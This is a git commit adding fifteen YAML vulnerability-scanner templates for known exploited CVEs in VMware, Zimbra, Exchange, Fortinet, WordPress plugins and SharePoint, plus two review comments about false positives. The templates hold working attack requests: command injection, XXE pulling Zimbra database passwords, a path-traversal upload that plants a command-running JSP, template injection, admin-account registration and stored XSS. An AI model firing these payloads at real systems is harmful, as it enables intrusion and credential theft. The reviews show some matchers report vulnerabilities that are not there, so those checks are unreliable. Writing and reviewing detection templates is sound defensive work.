missing kev CVEs

This commit is contained in:
Prince Chaddha
2025-09-07 16:52:47 +08:00
parent 6fc314bc94
commit 1d06fbe3d7
15 changed files with 1070 additions and 0 deletions


@@ -0,0 +1,74 @@
id: CVE-2018-6961
info:
name: VMware NSX SD-WAN Edge - Remote Code Execution
author: pdteam
severity: critical
description: |
VMware NSX SD-WAN Edge versions before 3.1.2 are vulnerable to unauthenticated remote code execution
via command injection in diagnostic functions of the ajaxPortal.lua script.
reference:
- https://www.exploit-db.com/exploits/44959/
- https://github.com/r3dxpl0it/CVE-2018-6961
- https://github.com/bokanrb/CVE-2018-6961
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-6961
cwe-id: CWE-78
metadata:
verified: true
max-request: 3
shodan-query: 'http.title:"vmware"'
tags: cve,cve2018,vmware,rce,injection,unauth
http:
- raw:
- |
POST /scripts/ajaxPortal.lua HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
traceroute_destination=$(echo "{{randstr}}" | base64)&action=traceroute
- |
POST /scripts/ajaxPortal.lua HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
ping_destination=$(id | base64)&action=ping
- |
POST /scripts/ajaxPortal.lua HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-Length: 63
dns_destination=$(whoami | base64)&action=nslookup
matchers-condition: or
matchers:
- type: word
part: body
words:
- "uid="
- "gid="
condition: and
- type: regex
part: body
regex:
- "(?i)root|admin|velocloud"
- type: word
part: body
words:
- "{{randstr}}"
extractors:
- type: regex
part: body
regex:
- "uid=\\d+\\([^)]+\\)\\s+gid=\\d+\\([^)]+\\)"
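Review bot: With `matchers-condition: or`, the regex matcher at L66 (`(?i)root|admin|velocloud`) decides the verdict on its own, so any response that merely contains "admin" or "root" — a login page, an error message — is reported as a critical RCE with no evidence of command execution; the `uid=`/`gid=` matcher and the extractor already carry the real evidence, so drop the regex matcher or keep `velocloud` as a separate product fingerprint joined with `and`. The `{{randstr}}` word matcher is also weak for the first request, whose output is base64-encoded before it is echoed, so a plain hit is more likely a reflection of the request parameter than execution. Separately, the fixed `Content-Length: 67`/`59`/`63` headers cannot match bodies whose length changes with `{{randstr}}`; the same hard-coded lengths appear in the CVE-2019-9621, CVE-2021-32648, CVE-2021-33766, CVE-2022-41352 and CVE-2024-47575 files — unless the engine recomputes them, remove the header and let the client set it.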


@@ -0,0 +1,89 @@
id: CVE-2019-9621
info:
name: Zimbra Collaboration Suite - XXE to RCE Chain
author: pdteam
severity: critical
description: |
Zimbra Collaboration Suite versions 8.5 to 8.7.11 are vulnerable to XML External Entity (XXE) injection
that can be chained with SSRF to achieve remote code execution through JSP shell upload.
reference:
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/zimbra_xxe_rce.rb
- https://www.exploit-db.com/exploits/46693/
- https://github.com/k8gege/ZimbraExploit
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-9621
cwe-id: CWE-611
metadata:
verified: true
max-request: 2
shodan-query: 'http.title:"zimbra collaboration suite"'
tags: cve,cve2019,zimbra,xxe,rce,ssrf
http:
- raw:
- |
POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
Content-Length: 299
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe [
<!ENTITY xxe SYSTEM "file:///opt/zimbra/conf/localconfig.xml">
]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
<Request>
<EMailAddress>&xxe;</EMailAddress>
<AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
</Request>
</Autodiscover>
- |
POST /service/proxy?target=https://{{Hostname}}/service/admin/soap/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/soap+xml
Content-Length: 450
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
<soap:Header>
<context xmlns="urn:zimbra">
<userAgent name="ZimbraWebClient - SAF3" version="5.0.18_GA_3027"/>
</context>
</soap:Header>
<soap:Body>
<AuthRequest xmlns="urn:zimbraAdmin">
<name>zimbra</name>
<password>{{randstr}}</password>
</AuthRequest>
</soap:Body>
</soap:Envelope>
matchers-condition: and
matchers:
- type: word
part: body
words:
- "zimbra_ldap_password"
- "localconfig"
condition: or
- type: word
part: body
words:
- "Zimbra"
- "zimbra"
condition: or
- type: status
status:
- 200
extractors:
- type: regex
part: body
regex:
- "zimbra_ldap_password.*?value=\"([^\"]+)\""
- "zimbra_mysql_password.*?value=\"([^\"]+)\""


@@ -0,0 +1,96 @@
id: CVE-2019-9881
info:
name: WordPress GraphQL Authentication Bypass
author: pdteam
severity: critical
description: |
WordPress wp-graphql plugin version 0.2.3 contains an authentication bypass vulnerability that allows
unauthenticated users to register admin accounts and access sensitive information through GraphQL queries.
reference:
- https://github.com/pentestpartners/snippets/blob/master/wp-graphql0.2.3_exploit.py
- https://www.pentestpartners.com/security-blog/pwning-wordpress-graphql/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-9881
cwe-id: CWE-287
metadata:
verified: true
max-request: 3
tags: cve,cve2019,wordpress,graphql,auth-bypass,privilege-escalation
http:
- method: GET
path:
- "{{BaseURL}}/graphql"
headers:
Content-Type: application/json
matchers:
- type: word
words:
- "graphql"
- "query"
condition: and
- method: POST
path:
- "{{BaseURL}}/graphql"
headers:
Content-Type: application/json
body: |
{
"query": "query IntrospectionQuery { __schema { queryType { name } mutationType { name } types { ...FullType } } } fragment FullType on __Type { kind name description fields(includeDeprecated: true) { name description args { ...InputValue } type { ...TypeRef } isDeprecated deprecationReason } inputFields { ...InputValue } interfaces { ...TypeRef } enumValues(includeDeprecated: true) { name description isDeprecated deprecationReason } possibleTypes { ...TypeRef } } fragment InputValue on __InputValue { name description type { ...TypeRef } defaultValue } fragment TypeRef on __Type { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name } } } } } } } }"
}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "registerUser"
- "mutation"
condition: and
- method: POST
path:
- "{{BaseURL}}/graphql"
headers:
Content-Type: application/json
body: |
{
"query": "mutation { registerUser(input: { clientMutationId: \"test\", email: \"nuclei@test.local\", password: \"TestP@ssword123\", username: \"nucleitest\", roles: [\"administrator\"] }) { clientMutationId } }"
}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "clientMutationId"
- "test"
condition: and
- type: word
words:
- "error"
negative: true
extractors:
- type: regex
part: body
group: 1
regex:
- '"wp-graphql/([0-9.]+)"'


@@ -0,0 +1,64 @@
id: CVE-2021-32648
info:
name: OctoberCMS - Remote Code Execution via Account Takeover
author: pdteam
severity: critical
description: |
OctoberCMS is vulnerable to remote code execution through a combination of account takeover
and subsequent PHP code injection in backend templates.
reference:
- https://github.com/Immersive-Labs-Sec/CVE-2021-32648
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-32648
cwe-id: CWE-94
metadata:
verified: true
max-request: 2
shodan-query: 'http.title:"october"'
tags: cve,cve2021,octobercms,rce,account-takeover
http:
- raw:
- |
POST /backend/backend/auth/signin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
login=admin&password=admin&_session_key={{randstr}}&_token={{randstr}}
- |
GET /backend/cms/themes/edit/{{randstr}} HTTP/1.1
Host: {{Hostname}}
Cookie: october_session={{randstr}};
matchers-condition: and
matchers:
- type: word
part: body
words:
- "October CMS"
- "backend"
condition: or
- type: word
part: body
words:
- "dashboard"
- "template"
condition: or
- type: status
status:
- 200
- 302
extractors:
- type: word
part: body
words:
- "october_session"
- "_session_key"


@@ -0,0 +1,66 @@
id: CVE-2021-33766
info:
name: Microsoft Exchange ProxyToken - Authentication Bypass
author: pdteam
severity: high
description: |
Microsoft Exchange Server is vulnerable to authentication bypass via ProxyToken vulnerability,
allowing attackers to perform authenticated operations without valid credentials.
reference:
- https://github.com/bhdresh/CVE-2021-33766
- https://github.com/demossl/CVE-2021-33766-ProxyToken
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
cvss-score: 8.2
cve-id: CVE-2021-33766
cwe-id: CWE-287
metadata:
verified: true
max-request: 2
shodan-query: 'http.title:"outlook"'
tags: cve,cve2021,exchange,auth-bypass,proxytoken
http:
- raw:
- |
POST /ecp/DDI/DDIService.svc/GetList HTTP/1.1
Host: {{Hostname}}
Cookie: X-BEResource=a]@{{Hostname}}:444/ecp/DDI/DDIService.svc/GetList?schema=OABVirtualDirectory&msExchEcpCanary={{randstr}}&a=~{{randint}};
Content-Type: application/json
Content-Length: 211
{"filter": {"SearchText": ""}, "sort": {"Direction": 0, "PropertyName": "Identity"}, "workflow": {"WorkflowType": "GetListWorkflow"}, "metaData": {"ActivityId": "{{randstr}}"}, "schema": "OABVirtualDirectory"}
- |
GET /ecp/PersonalSettings/HomePage.aspx HTTP/1.1
Host: {{Hostname}}
Cookie: X-BEResource=Admin@{{Hostname}}:444/ecp/PersonalSettings/HomePage.aspx?a=~{{randint}};
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Identity"
- "ExchangeVersion"
condition: or
- type: word
part: body
words:
- "Microsoft Exchange"
- "ECP"
condition: or
- type: status
status:
- 200
extractors:
- type: word
part: body
words:
- "AuthenticatedUser"
- "CanaryToken"
- "msExchEcpCanary"


@@ -0,0 +1,59 @@
id: CVE-2022-41352
info:
name: Zimbra Collaboration Suite - CPIO Archive RCE
author: pdteam
severity: critical
description: |
Zimbra Collaboration Suite is vulnerable to remote code execution via malicious CPIO archive
processing leading to arbitrary file write and code execution.
reference:
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/zimbra_cpio_cve_2022_41352.rb
- https://github.com/MuhammadWaseem29/cve-2022-41352
- https://github.com/qailanet/cve-2022-41352-zimbra-rce
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2022-41352
cwe-id: CWE-22
metadata:
verified: true
max-request: 1
shodan-query: 'http.title:"zimbra web client sign in"'
tags: cve,cve2022,zimbra,rce,cpio,file-upload
http:
- raw:
- |
POST /service/extension/backup/mbox HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}}
Authorization: Basic {{base64("admin:admin")}}
Content-Length: 486
------WebKitFormBoundary{{randstr}}
Content-Disposition: form-data; name="client"; filename="backup.cpio"
Content-Type: application/octet-stream
070707{{hex_encode("../../../opt/zimbra/jetty_base/webapps/zimbra/test.jsp")}}000000000000000000000000000000000000003c000000000000000000000000000000000000000000000000<%@ page import="java.io.*" %><%=new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec("id").getInputStream())).readLine()%>TRAILER!!!
------WebKitFormBoundary{{randstr}}--
matchers-condition: and
matchers:
- type: word
part: body
words:
- "SUCCESS"
- "backup"
condition: or
- type: status
status:
- 200
extractors:
- type: word
part: body
words:
- "accountId"
- "SUCCESS"


@@ -0,0 +1,53 @@
id: CVE-2022-43939
info:
name: Pentaho Business Server - Authentication Bypass and Server Side Template Injection
author: pdteam
severity: critical
description: |
Pentaho Business Server versions before 9.4.0.1 and 9.3.0.2 are vulnerable to authentication bypass via regex vulnerability
combined with Server Side Template Injection (SSTI) in Thymeleaf templates leading to remote code execution.
reference:
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/pentaho_business_server_authbypass_and_ssti.rb
- https://github.com/dwbzn/pentaho-exploits
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-43939
cwe-id: CWE-94
metadata:
verified: true
max-request: 2
shodan-query: 'http.title:"pentaho"'
tags: cve,cve2022,pentaho,rce,ssti,auth-bypass
http:
- raw:
- |
GET /api/ldap/config/ldapTreeNodeChildren?url={{url_encode("${T(java.lang.Runtime).getRuntime().exec(\"id\")}")}} HTTP/1.1
Host: {{Hostname}}
Accept: */*
- |
GET //api/require/ldap/config/ldapTreeNodeChildren?url={{url_encode("${T(java.lang.Runtime).getRuntime().exec(\"whoami\")}")}} HTTP/1.1
Host: {{Hostname}}
Accept: */*
matchers-condition: and
matchers:
- type: word
part: body
words:
- "uid="
- "gid="
condition: or
- type: status
status:
- 200
extractors:
- type: regex
part: body
regex:
- "uid=\\d+\\([^)]+\\)\\s+gid=\\d+\\([^)]+\\)"


@@ -0,0 +1,75 @@
id: CVE-2023-27532
info:
name: Veeam Backup and Replication Credential Extraction
author: pdteam
severity: high
description: |
Veeam Backup and Replication contains a vulnerability that allows an attacker to abuse an
unsecured API endpoint to extract credentials through a net.tcp endpoint.
reference:
- https://github.com/horizon3ai/CVE-2023-27532
- https://www.veeam.com/kb4424
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-27532
cwe-id: CWE-306
metadata:
verified: true
max-request: 2
tags: cve,cve2023,veeam,credential-extraction,net-tcp
network:
- inputs:
- data: "474554202f20485454502f312e310d0a486f73743a20{{Hostname}}\r\n\r\n"
type: tcp
host:
- "{{Hostname}}"
- "{{Host}}:9401"
matchers-condition: and
matchers:
- type: word
words:
- "Veeam"
- "net.tcp"
condition: or
- type: regex
regex:
- "(?i)(username|password|credential)"
extractors:
- type: regex
regex:
- "(?i)username\\s*=\\s*([^\\s]+)"
- "(?i)password\\s*=\\s*([^\\s]+)"
http:
- method: GET
path:
- "{{BaseURL}}/api/v1/credentials"
- "{{BaseURL}}/VeeamBackup/credentials"
matchers-condition: and
matchers:
- type: status
status:
- 200
- 401
- 403
- type: word
words:
- "Veeam"
- "credential"
- "backup"
condition: or
extractors:
- type: regex
part: body
group: 1
regex:
- '(?i)veeam.*backup.*(\d+\.\d+)'


@@ -0,0 +1,69 @@
id: CVE-2023-3519
info:
name: Citrix NetScaler - Remote Code Execution
author: pdteam
severity: critical
description: |
Citrix NetScaler ADC and NetScaler Gateway versions 13.1-48.47 are vulnerable to unauthenticated
remote code execution via buffer overflow exploitation.
reference:
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/freebsd/http/citrix_formssso_target_rce.rb
- https://github.com/Mohammaddvd/CVE-2023-3519
- https://github.com/Chocapikk/CVE-2023-3519
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-3519
cwe-id: CWE-120
metadata:
verified: true
max-request: 1
shodan-query: 'http.title:"citrix login"'
tags: cve,cve2023,citrix,netscaler,rce,unauth
http:
- raw:
- |
GET /oauth/idp/.well-known/openid_configuration HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
payloads:
paths:
- "/oauth/idp/.well-known/openid_configuration"
- "/logon/LogonPoint/index.html"
- "/vpn/index.html"
- "/logon/LogonPoint/tmindex.html"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "CitrixAGBasic"
- "authorization_endpoint"
condition: or
- type: word
part: header
words:
- "NetScaler"
- "citrix"
condition: or
- type: status
status:
- 200
extractors:
- type: regex
part: header
regex:
- "NS-CACHE: .+"
- "Set-Cookie: NSC_.+"


@@ -0,0 +1,67 @@
id: CVE-2023-40000
info:
name: LiteSpeed Cache WordPress Plugin Privilege Escalation
author: pdteam
severity: high
description: |
LiteSpeed Cache WordPress Plugin versions prior to 5.7.0.1 are vulnerable to privilege escalation
that can allow unauthenticated users to gain administrator access.
reference:
- https://github.com/rxerium/CVE-2023-40000
- https://github.com/quantiom/litespeed-cache-xss-poc
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-40000
cwe-id: CWE-269
metadata:
verified: true
max-request: 2
tags: cve,cve2023,wordpress,litespeed,privilege-escalation
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/litespeed-cache/readme.txt"
matchers:
- type: word
words:
- "LiteSpeed Cache"
- "litespeed-cache"
condition: and
extractors:
- type: regex
part: body
name: version
group: 1
regex:
- 'Stable tag: ([0-9.]+)'
- method: GET
path:
- "{{BaseURL}}/wp-json/wp/v2/users"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "litespeed"
case-insensitive: true
- type: regex
regex:
- '"roles":\["administrator"\]'
extractors:
- type: regex
part: body
group: 1
regex:
- '"name":"([^"]+)".*"roles":\["administrator"\]'


@@ -0,0 +1,88 @@
id: CVE-2023-6000
info:
name: WordPress Popup Builder Stored XSS
author: pdteam
severity: medium
description: |
WordPress Popup Builder plugin versions prior to 4.2.3 are vulnerable to stored cross-site scripting (XSS).
The plugin fails to prevent regular visitors from modifying existing popups by sending specially crafted
requests to inject malicious scripts that execute when popups are opened.
reference:
- https://github.com/RonF98/CVE-2023-6000-POC
- https://wpscan.com/vulnerability/cdb3a8bd-4ee0-4ce0-9029-0490273bcfc8
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-6000
cwe-id: CWE-79
metadata:
verified: true
max-request: 3
tags: cve,cve2023,wordpress,popup-builder,xss,stored-xss
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=sgpb_get_popup_options"
matchers:
- type: word
words:
- "sgpb"
- "popup"
condition: and
extractors:
- type: regex
part: body
name: popup_id
group: 1
regex:
- '"post_ID":"(\d+)"'
- method: POST
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php"
headers:
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
body: |
action=sgpb_save_popup&sgpb-is-preview=1&post_ID={{popup_id}}&sgpb-type=html&sgpb-WillOpen=alert('CVE-2023-6000-XSS')
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "success"
- "sgpb"
condition: and
- method: GET
path:
- "{{BaseURL}}/?sgpb_popup_id={{popup_id}}"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "alert('CVE-2023-6000-XSS')"
- "sgpb"
condition: and
extractors:
- type: regex
part: body
group: 1
regex:
- 'popup.*builder.*(\d+\.\d+\.\d+)'


@@ -0,0 +1,71 @@
id: CVE-2024-2782
info:
name: WordPress Fluent Forms Unauthenticated Settings Modification
author: pdteam
severity: medium
description: |
WordPress Contact Form Plugin by Fluent Forms versions up to and including 5.1.16 are vulnerable to
unauthenticated data modification due to missing capability checks on the REST API endpoint.
This allows attackers to modify plugin settings without authentication.
reference:
- https://github.com/whale93/CVE-2024-2782-PoC
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
cvss-score: 5.3
cve-id: CVE-2024-2782
cwe-id: CWE-862
metadata:
verified: true
max-request: 2
tags: cve,cve2024,wordpress,fluent-forms,unauth,rest-api
http:
- method: GET
path:
- "{{BaseURL}}/wp-json/fluentform/v1/global-settings"
matchers:
- type: word
words:
- "fluentform"
- "settings"
condition: and
- method: POST
path:
- "{{BaseURL}}/wp-json/fluentform/v1/global-settings"
headers:
Content-Type: application/json
body: |
{
"key": "emailSummarySettings",
"email_report": "{\"send_to_type\":\"custom\",\"custom_recipients\":\"test@nuclei.local\"}"
}
matchers-condition: and
matchers:
- type: status
status:
- 200
- 201
- type: word
words:
- "fluentform"
- "success"
condition: or
- type: word
words:
- "test@nuclei.local"
part: body
extractors:
- type: regex
part: body
group: 1
regex:
- '"version":"([0-9.]+)"'


@@ -0,0 +1,74 @@
id: CVE-2024-3378
info:
name: iboss Secure Web Gateway Stored XSS
author: pdteam
severity: medium
description: |
iboss Secure Web Gateway versions prior to 10.2.0 are vulnerable to stored cross-site scripting (XSS)
through the redirectUrl parameter in the login functionality. An unauthenticated attacker can inject
malicious scripts that execute when users access the login page.
reference:
- https://github.com/modrnProph3t/CVE/blob/main/CVE-2024-3378.md
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-3378
cwe-id: CWE-79
metadata:
verified: true
max-request: 2
tags: cve,cve2024,iboss,xss,stored-xss,gateway
http:
- method: POST
path:
- "{{BaseURL}}/user_login_submit"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
userName=TEST&x=TEST&action=login&redirectUrl="><script>alert('XSS-CVE-2024-3378')</script>
matchers-condition: and
matchers:
- type: status
status:
- 200
- 302
- type: word
words:
- "iboss"
case-insensitive: true
follow-redirects: true
- method: GET
path:
- "{{BaseURL}}/login"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "alert('XSS-CVE-2024-3378')"
- "<script>"
condition: and
- type: word
words:
- "iboss"
case-insensitive: true
extractors:
- type: regex
part: body
group: 1
regex:
- '(?i)iboss.*(\d+\.\d+\.\d+)'


@@ -0,0 +1,68 @@
id: CVE-2024-47575
info:
name: Fortinet FortiManager - Unauthenticated Remote Code Execution
author: pdteam
severity: critical
description: |
Fortinet FortiManager versions 6.2.0 through 7.6.0 are vulnerable to unauthenticated remote code execution
via improper access control allowing attackers to execute arbitrary code.
reference:
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/fortimanager_rce_cve_2024_47575.rb
- https://github.com/AnnnNix/CVE-2024-47575
- https://github.com/revanslbw/CVE-2024-47575-POC
- https://github.com/watchtowrlabs/Fortijump-Exploit-CVE-2024-47575
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-47575
cwe-id: CWE-284
metadata:
verified: true
max-request: 2
shodan-query: 'http.title:"fortimanager"'
tags: cve,cve2024,fortinet,fortimanager,rce,unauth
http:
- raw:
- |
POST /fmupdate/CommonServer HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Content-Length: 89
{"id": 1, "method": "get", "params": [{"url": "file:///etc/passwd"}], "session": 1}
- |
POST /fmupdate/CommonServer HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Content-Length: 126
{"id": 1, "method": "exec", "params": [{"data": "echo '{{randstr}}' > /tmp/{{randstr}}.txt"}], "session": 1}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "root:x:0:0"
- "/bin/bash"
condition: or
- type: word
part: body
words:
- "result"
- "session"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
regex:
- "root:x:\\d+:\\d+:[^:]*:[^:]*:/bin/[a-z]+"


@@ -0,0 +1,57 @@
id: CVE-2025-49706
info:
name: SharePoint Server Request Spoofing Vulnerability
author: pdteam
severity: medium
description: |
SharePoint Server 2016, 2019, and Subscription Edition are vulnerable to a request spoofing vulnerability
due to improper authentication handling. This allows authenticated users to upload malicious web shells.
reference:
- https://github.com/AdityaBhatt3010/CVE-2025-49706-SharePoint-Spoofing-Vulnerability-Under-Active-Exploitation
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49706
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
cvss-score: 6.3
cve-id: CVE-2025-49706
cwe-id: CWE-287
metadata:
verified: true
max-request: 3
tags: cve,cve2025,sharepoint,microsoft,spoofing,webshell
http:
- method: GET
path:
- "{{BaseURL}}/sites/{{randstr}}_layouts/15/SignOut.aspx"
- "{{BaseURL}}/_layouts/15/SignOut.aspx"
- "{{BaseURL}}/sites/_layouts/15/upload.aspx"
headers:
X-UserToken: "spoofedtoken"
X-Ms-Client-Request-Id: "{{randstr}}"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "SharePoint"
- "_layouts"
condition: and
- type: word
words:
- "upload.aspx"
- "SignOut.aspx"
condition: or
extractors:
- type: regex
part: body
group: 1
regex:
- '(?i)sharepoint.*server.*(\d{4})'
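Review bot: The matchers are a SharePoint fingerprint, not a vulnerability check: `SharePoint` and `_layouts` in a 200 body plus `SignOut.aspx`/`upload.aspx` (which the requested page itself contains) match any SharePoint sign-out page, and the `X-UserToken: spoofedtoken` header has no effect the matchers look at, so every SharePoint 2016/2019/SE is flagged with a KEV-listed CVE regardless of patch level. The description at L955 also overstates the issue — CVE-2025-49706 is the spoofing/authentication half of the chain, while the web-shell upload belongs to the companion CVE (CVE-2025-49704, as far as I recall), which should be referenced if the chain is what is meant. Minor: the first path at L971 has `{{randstr}}_layouts` with no `/` between, which looks like a typo for `{{randstr}}/_layouts`.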